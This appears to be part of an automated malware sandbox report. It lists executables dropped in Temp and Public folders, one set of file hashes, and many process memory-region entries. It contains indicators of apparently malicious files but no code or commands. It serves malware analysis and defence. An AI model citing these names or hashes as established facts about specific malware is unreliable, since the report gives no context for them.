              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\j7ajDwAuis.exe
              • \Users\Admin\AppData\Local\Temp\nkxy8FTNOc.exe
              • \Users\Admin\AppData\Local\Temp\ufeP9Abbpx.exe
              • \Users\Admin\AppData\Local\Temp\yaykE2jv2g.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • \Users\Public\dgt.exe
              • \Users\Public\nmf.exe
              • \Users\Public\nmf.exe
              • \Users\Public\yad.exe
              • \Users\Public\yad.exe
              • memory/824-15-0x0000000000000000-mapping.dmp
              • memory/872-332-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/872-336-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/872-333-0x0000000000417A8B-mapping.dmp
              • memory/924-29-0x0000000000000000-mapping.dmp
              • memory/952-27-0x0000000000000000-mapping.dmp
              • memory/1032-13-0x0000000000000000-mapping.dmp
              • memory/1092-35-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/1092-31-0x0000000000000000-mapping.dmp
              • memory/1224-523-0x0000000000000000-mapping.dmp
              • memory/1224-569-0x0000000000000000-mapping.dmp
              • memory/1224-475-0x0000000000000000-mapping.dmp
              • memory/1224-473-0x0000000000000000-mapping.dmp
              • memory/1224-471-0x0000000000000000-mapping.dmp
              • memory/1224-469-0x0000000000000000-mapping.dmp
              • memory/1224-521-0x0000000000000000-mapping.dmp
              • memory/1224-481-0x0000000000000000-mapping.dmp
              • memory/1224-525-0x0000000000000000-mapping.dmp
              • memory/1224-467-0x0000000000000000-mapping.dmp
              • memory/1224-527-0x0000000000000000-mapping.dmp
              • memory/1224-529-0x0000000000000000-mapping.dmp
              • memory/1224-531-0x0000000000000000-mapping.dmp
              • memory/1224-465-0x0000000000000000-mapping.dmp
              • memory/1224-533-0x0000000000000000-mapping.dmp
              • memory/1224-535-0x0000000000000000-mapping.dmp
              • memory/1224-537-0x0000000000000000-mapping.dmp
              • memory/1224-539-0x0000000000000000-mapping.dmp
              • memory/1224-463-0x0000000000000000-mapping.dmp
              • memory/1224-541-0x0000000000000000-mapping.dmp
              • memory/1224-543-0x0000000000000000-mapping.dmp
              • memory/1224-545-0x0000000000000000-mapping.dmp
              • memory/1224-547-0x0000000000000000-mapping.dmp
              • memory/1224-461-0x0000000000000000-mapping.dmp
              • memory/1224-479-0x0000000000000000-mapping.dmp
              • memory/1224-519-0x0000000000000000-mapping.dmp
              • memory/1224-517-0x0000000000000000-mapping.dmp
              • memory/1224-515-0x0000000000000000-mapping.dmp
              • memory/1224-459-0x0000000000000000-mapping.dmp
              • memory/1224-513-0x0000000000000000-mapping.dmp
              • memory/1224-549-0x0000000000000000-mapping.dmp
              • memory/1224-511-0x0000000000000000-mapping.dmp
              • memory/1224-551-0x0000000000000000-mapping.dmp
              • memory/1224-553-0x0000000000000000-mapping.dmp
              • memory/1224-509-0x0000000000000000-mapping.dmp
              • memory/1224-507-0x0000000000000000-mapping.dmp
              • memory/1224-505-0x0000000000000000-mapping.dmp
              • memory/1224-555-0x0000000000000000-mapping.dmp
              • memory/1224-503-0x0000000000000000-mapping.dmp
              • memory/1224-557-0x0000000000000000-mapping.dmp
              • memory/1224-559-0x0000000000000000-mapping.dmp
              • memory/1224-561-0x0000000000000000-mapping.dmp
              • memory/1224-563-0x0000000000000000-mapping.dmp
              • memory/1224-565-0x0000000000000000-mapping.dmp
              • memory/1224-567-0x0000000000000000-mapping.dmp
              • memory/1224-477-0x0000000000000000-mapping.dmp
              • memory/1224-571-0x0000000000000000-mapping.dmp
              • memory/1224-573-0x0000000000000000-mapping.dmp
              • memory/1224-575-0x0000000000000000-mapping.dmp
              • memory/1224-457-0x0000000000000000-mapping.dmp
              • memory/1224-455-0x0000000000000000-mapping.dmp
              • memory/1224-453-0x0000000000000000-mapping.dmp
              • memory/1224-577-0x0000000000000000-mapping.dmp
              • memory/1224-579-0x0000000000000000-mapping.dmp
              • memory/1224-501-0x0000000000000000-mapping.dmp
              • memory/1224-581-0x0000000000000000-mapping.dmp
              • memory/1224-583-0x0000000000000000-mapping.dmp
              • memory/1224-451-0x0000000000000000-mapping.dmp
              • memory/1224-449-0x0000000000000000-mapping.dmp
              • memory/1224-499-0x0000000000000000-mapping.dmp
              • memory/1224-447-0x0000000000000000-mapping.dmp
              • memory/1224-497-0x0000000000000000-mapping.dmp
              • memory/1224-445-0x0000000000000000-mapping.dmp
              • memory/1224-585-0x0000000000000000-mapping.dmp
              • memory/1224-495-0x0000000000000000-mapping.dmp
              • memory/1224-443-0x0000000000000000-mapping.dmp
              • memory/1224-441-0x0000000000000000-mapping.dmp
              • memory/1224-493-0x0000000000000000-mapping.dmp
              • memory/1224-439-0x0000000000000000-mapping.dmp
              • memory/1224-491-0x0000000000000000-mapping.dmp
              • memory/1224-489-0x0000000000000000-mapping.dmp
              • memory/1224-437-0x0000000000000000-mapping.dmp
              • memory/1224-587-0x0000000000000000-mapping.dmp
              • memory/1224-589-0x0000000000000000-mapping.dmp
              • memory/1224-435-0x0000000000000000-mapping.dmp
              • memory/1224-487-0x0000000000000000-mapping.dmp
              • memory/1224-434-0x0000000000120000-0x0000000000121000-memory.dmp
                Filesize

                4KB

              • memory/1224-433-0x0000000000000000-mapping.dmp
              • memory/1224-591-0x0000000000000000-mapping.dmp
              • memory/1224-593-0x0000000000000000-mapping.dmp
              • memory/1224-432-0x00000000000A0000-0x00000000000A1000-memory.dmp
                Filesize

                4KB

              • memory/1224-595-0x0000000000000000-mapping.dmp
              • memory/1224-485-0x0000000000000000-mapping.dmp
              • memory/1224-483-0x0000000000000000-mapping.dmp
              • memory/1224-597-0x0000000000000000-mapping.dmp
              • memory/1224-599-0x0000000000000000-mapping.dmp
              • memory/1224-601-0x0000000000000000-mapping.dmp
              • memory/1224-603-0x0000000000000000-mapping.dmp
              • memory/1224-605-0x0000000000000000-mapping.dmp
              • memory/1304-425-0x00000000737E0000-0x0000000073ECE000-memory.dmp
                Filesize

                6.9MB

              • memory/1304-426-0x00000000025A0000-0x00000000025A1000-memory.dmp
                Filesize

                4KB

              • memory/1304-422-0x0000000000000000-mapping.dmp
              • memory/1304-429-0x0000000005400000-0x0000000005401000-memory.dmp
                Filesize

                4KB

              • memory/1304-428-0x00000000052C0000-0x00000000052C1000-memory.dmp
                Filesize

                4KB

              • memory/1304-427-0x0000000004850000-0x0000000004851000-memory.dmp
                Filesize

                4KB

              • memory/1384-4-0x0000000000000000-mapping.dmp
              • memory/1384-5-0x0000000000000000-mapping.dmp
              • memory/1496-351-0x0000000000000000-mapping.dmp
              • memory/1516-0-0x0000000000000000-mapping.dmp
              • memory/1584-16-0x0000000000000000-mapping.dmp
              • memory/1616-352-0x0000000000000000-mapping.dmp
              • memory/1688-290-0x0000000000000000-mapping.dmp
              • memory/1776-10-0x0000000000000000-mapping.dmp
              • memory/1788-11-0x0000000000000000-mapping.dmp
              • memory/1828-8-0x0000000000000000-mapping.dmp
              • memory/1844-288-0x0000000000000000-mapping.dmp
              • memory/1860-302-0x0000000000000000-mapping.dmp
              • memory/1860-327-0x0000000000330000-0x0000000000331000-memory.dmp
                Filesize

                4KB

              • memory/1860-307-0x0000000070C90000-0x000000007137E000-memory.dmp
                Filesize

                6.9MB

              • memory/1860-317-0x00000000002B0000-0x00000000002B1000-memory.dmp
                Filesize

                4KB

              • memory/1860-353-0x0000000000390000-0x00000000003B4000-memory.dmp
                Filesize

                144KB

              • memory/1888-54-0x0000000002910000-0x0000000002911000-memory.dmp
                Filesize

                4KB

              • memory/1888-17-0x0000000000000000-mapping.dmp
              • memory/1888-24-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/1908-25-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/1908-18-0x0000000000000000-mapping.dmp
              • memory/1960-48-0x00000000025C0000-0x00000000025C1000-memory.dmp
                Filesize

                4KB

              • memory/1960-22-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/1960-20-0x0000000000000000-mapping.dmp
              • memory/1968-224-0x0000000006550000-0x0000000006551000-memory.dmp
                Filesize

                4KB

              • memory/1968-19-0x0000000000000000-mapping.dmp
              • memory/1968-223-0x0000000006500000-0x0000000006501000-memory.dmp
                Filesize

                4KB

              • memory/1968-23-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/2012-30-0x0000000000000000-mapping.dmp
              • memory/2012-75-0x0000000006520000-0x0000000006521000-memory.dmp
                Filesize

                4KB

              • memory/2012-67-0x0000000005970000-0x0000000005971000-memory.dmp
                Filesize

                4KB

              • memory/2012-36-0x0000000000D00000-0x0000000000D01000-memory.dmp
                Filesize

                4KB

              • memory/2012-37-0x0000000004C50000-0x0000000004C51000-memory.dmp
                Filesize

                4KB

              • memory/2012-68-0x0000000006490000-0x0000000006491000-memory.dmp
                Filesize

                4KB

              • memory/2012-172-0x0000000006610000-0x0000000006611000-memory.dmp
                Filesize

                4KB

              • memory/2012-34-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/2012-80-0x0000000006540000-0x0000000006541000-memory.dmp
                Filesize

                4KB

              • memory/2012-200-0x0000000006750000-0x0000000006751000-memory.dmp
                Filesize

                4KB

              • memory/2012-201-0x00000000067A0000-0x00000000067A1000-memory.dmp
                Filesize

                4KB

              • memory/2012-62-0x0000000005920000-0x0000000005921000-memory.dmp
                Filesize

                4KB

              • memory/2060-417-0x0000000000000000-mapping.dmp
              • memory/2196-292-0x0000000000000000-mapping.dmp
              • memory/2252-421-0x00000000004B0000-0x00000000004D3000-memory.dmp
                Filesize

                140KB

              • memory/2252-423-0x0000000000510000-0x0000000000534000-memory.dmp
                Filesize

                144KB

              • memory/2252-373-0x0000000001140000-0x0000000001141000-memory.dmp
                Filesize

                4KB

              • memory/2252-369-0x0000000000000000-mapping.dmp
              • memory/2252-372-0x00000000737E0000-0x0000000073ECE000-memory.dmp
                Filesize

                6.9MB

              • memory/2364-256-0x0000000000130000-0x0000000000131000-memory.dmp
                Filesize

                4KB

              • memory/2364-291-0x0000000002280000-0x00000000022D1000-memory.dmp
                Filesize

                324KB

              • memory/2364-298-0x0000000004D00000-0x0000000004D02000-memory.dmp
                Filesize

                8KB

              • memory/2364-258-0x00000000002D0000-0x00000000002D1000-memory.dmp
                Filesize

                4KB

              • memory/2364-254-0x0000000070C90000-0x000000007137E000-memory.dmp
                Filesize

                6.9MB

              • memory/2364-252-0x0000000000000000-mapping.dmp
              • memory/2412-112-0x0000000000040000-0x0000000000041000-memory.dmp
                Filesize

                4KB

              • memory/2412-102-0x0000000000000000-mapping.dmp
              • memory/2412-106-0x00000000710B0000-0x000000007179E000-memory.dmp
                Filesize

                6.9MB

              • memory/2412-232-0x00000000020F0000-0x00000000020FD000-memory.dmp
                Filesize

                52KB

              • memory/2412-221-0x0000000004960000-0x0000000004A10000-memory.dmp
                Filesize

                704KB

              • memory/2448-109-0x0000000000000000-mapping.dmp
              • memory/2480-231-0x0000000000000000-mapping.dmp
              • memory/2480-255-0x00000000029C0000-0x00000000029C4000-memory.dmp
                Filesize

                16KB

              • memory/2484-116-0x0000000000000000-mapping.dmp
              • memory/2512-412-0x0000000000700000-0x0000000000705000-memory.dmp
                Filesize

                20KB

              • memory/2512-389-0x0000000000A50000-0x0000000000A51000-memory.dmp
                Filesize

                4KB

              • memory/2512-382-0x00000000737E0000-0x0000000073ECE000-memory.dmp
                Filesize

                6.9MB

              • memory/2512-379-0x0000000000000000-mapping.dmp
              • memory/2512-395-0x00000000005D0000-0x00000000005D1000-memory.dmp
                Filesize

                4KB

              • memory/2512-419-0x0000000004CD0000-0x0000000004CD2000-memory.dmp
                Filesize

                8KB

              • memory/2512-400-0x00000000007B0000-0x00000000007C2000-memory.dmp
                Filesize

                72KB

              • memory/2512-414-0x0000000000560000-0x0000000000570000-memory.dmp
                Filesize

                64KB

              • memory/2540-123-0x0000000000000000-mapping.dmp
              • memory/2560-246-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/2560-240-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/2560-241-0x000000000043FCC3-mapping.dmp
              • memory/2564-289-0x0000000000000000-mapping.dmp
              • memory/2580-128-0x0000000000000000-mapping.dmp
              • memory/2620-144-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2620-136-0x000000000043FCC3-mapping.dmp
              • memory/2620-133-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2648-141-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2648-147-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2648-142-0x0000000000417A8B-mapping.dmp
              • memory/2668-140-0x0000000000000000-mapping.dmp
              • memory/2668-431-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                Filesize

                304KB

              • memory/2668-376-0x0000000000000000-mapping.dmp
              • memory/2732-152-0x0000000000000000-mapping.dmp
              • memory/2744-365-0x000000000041A684-mapping.dmp
              • memory/2744-364-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/2744-367-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/2760-156-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2760-160-0x000000000041A684-mapping.dmp
              • memory/2760-163-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2832-168-0x0000000000417A8B-mapping.dmp
              • memory/2836-399-0x0000000000000000-mapping.dmp
              • memory/2836-406-0x0000000005420000-0x0000000005421000-memory.dmp
                Filesize

                4KB

              • memory/2836-402-0x00000000737E0000-0x0000000073ECE000-memory.dmp
                Filesize

                6.9MB

              • memory/2836-403-0x0000000000D00000-0x0000000000D01000-memory.dmp
                Filesize

                4KB

              • memory/2836-404-0x0000000004960000-0x0000000004961000-memory.dmp
                Filesize

                4KB

              • memory/2836-405-0x0000000004810000-0x0000000004811000-memory.dmp
                Filesize

                4KB

              • memory/2852-186-0x000007FEF8550000-0x000007FEF87CA000-memory.dmp
                Filesize

                2.5MB

              • memory/2912-388-0x00000000737E0000-0x0000000073ECE000-memory.dmp
                Filesize

                6.9MB

              • memory/2912-393-0x0000000000420000-0x0000000000421000-memory.dmp
                Filesize

                4KB

              • memory/2912-396-0x0000000000430000-0x0000000000441000-memory.dmp
                Filesize

                68KB

              • memory/2912-397-0x0000000000680000-0x0000000000683000-memory.dmp
                Filesize

                12KB

              • memory/2912-391-0x00000000011B0000-0x00000000011B1000-memory.dmp
                Filesize

                4KB

              • memory/2912-384-0x0000000000000000-mapping.dmp
              • memory/2916-385-0x0000000000000000-mapping.dmp
              • memory/2920-181-0x000000000041A684-mapping.dmp
              • memory/2936-177-0x000000000043FCC3-mapping.dmp
              • memory/3000-287-0x0000000000000000-mapping.dmp
              • memory/3052-394-0x0000000000000000-mapping.dmp